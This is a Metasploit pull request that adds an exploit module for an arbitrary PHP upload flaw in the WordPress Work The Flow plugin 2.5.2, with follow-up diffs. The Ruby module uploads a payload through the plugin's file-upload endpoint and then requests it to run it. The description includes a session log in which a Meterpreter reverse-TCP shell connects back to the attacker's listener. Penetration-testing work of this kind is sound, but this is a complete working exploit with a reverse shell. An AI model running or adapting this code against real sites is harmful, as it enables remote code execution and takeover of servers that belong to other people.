### PR TITLE
Add Module WordPress WorkTheFlow Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -20,12 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
+          'Claudio Viviani', # Vulnerability discovery
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL', 'http://domain.com']
+          ['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',

--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -40,16 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi(
-      'uri'    => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php')
-    )
-
-    if res && res.code == 200 && res.body =~ /files/
-      return Exploit::CheckCode::Detected
-    end
-
-    Exploit::CheckCode::Safe
+    check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.2')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -66,11 +66,15 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'      => post_data
     })
 
-    if res && res.code == 200 && res.body
-      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
-      register_files_for_cleanup(php_pagename)
+    if res
+      if res.code == 200
+        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        register_files_for_cleanup(php_pagename)
+      else
+        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
     else
-      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      fail_with('ERROR')
     end
 
     print_status("#{peer} - Calling payload...")

--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -26,6 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
+          ['WPVDB', '7883'],
+          ['EDB', '36640'],
           ['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html']
         ],
       'Privileged'     => false,

--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Work The Flow Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin,
+        version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://domain.com']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Work The Flow 2.5.2', {}]],
+      'DisclosureDate' => 'Mar 14 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
+                                'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php')
+    )
+
+    if res && res.code == 200 && res.body =~ /files/
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="action"')
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
+                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'method'    => 'POST',
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    })
+
+    if res && res.code == 200 && res.body
+      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+      register_files_for_cleanup(php_pagename)
+    else
+      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+    end
+
+    print_status("#{peer} - Calling payload...")
+    send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
+                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+    }, 2)
+  end
+end

--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -71,9 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     print_status("#{peer} - Calling payload...")
-    send_request_cgi({
+    send_request_cgi(
       'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
                                    'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
-    }, 2)
+    )
   end
 end


### PR DESCRIPTION
#### Add WordPress Work The Flow 2.5.2 Shell Upload.

  Application: WordPress Work The Flow File Upload
  Homepage: https://wordpress.org/plugins/work-the-flow-file-upload/
  Source Code: https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip
#### Vulnerable packages*

  2.5.2 
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_worktheflow_upload 
msf exploit(wp_worktheflow_upload) > show options 

Module options (exploit/unix/webapp/wp_worktheflow_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      localhost        yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Work The Flow 2.5.2


msf exploit(wp_worktheflow_upload) > info

       Name: Wordpress Work The Flow Upload Vulnerability
     Module: exploit/unix/webapp/wp_worktheflow_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  Claudio Viviani
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Work The Flow 2.5.2

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      localhost        yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  Work The Flow plugin, version 2.5.2. The vulnerability allows for 
  arbitrary file upload and remote code execution.

References:
  http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html

msf exploit(wp_worktheflow_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_worktheflow_upload) > exploit

[*] Started reverse handler on 192.168.1.46:4444 
[+] 192.168.1.31:80 - Our payload is at: XcHULYXfBVi.php. Calling payload...
[*] 192.168.1.31:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:39966) at 2015-04-12 21:05:13 -0300
[+] Deleted XcHULYXfBVi.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter >
```
